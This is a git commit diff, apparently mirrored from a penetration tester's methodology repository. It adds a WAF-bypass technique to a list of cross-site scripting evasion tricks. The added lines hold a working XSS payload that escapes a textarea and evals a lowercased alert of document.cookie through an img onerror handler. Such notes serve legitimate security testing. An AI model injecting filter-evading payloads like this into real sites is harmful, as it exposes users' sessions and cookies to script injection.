mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-10 06:04:20 +00:00
GITBOOK-31: change request with no subject merged in GitBook
This commit is contained in:
parent
4e72118a31
commit
267f08bd9b
1 changed files with 6 additions and 0 deletions
|
@ -333,6 +333,12 @@ Here’s a list of 7 useful techniques on how we can bypass WAF (Web Application
|
|||
|
||||
GET /?q=xss POST /q=xss
|
||||
|
||||
8. Try capatalizing alert function:
|
||||
|
||||
```
|
||||
</textarea><img src=x onerror=”var pop=’ALERT(document.cookie);’; eval(pop.toLowerCase());”
|
||||
```
|
||||
|
||||
### Short XSS Payload:
|
||||
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue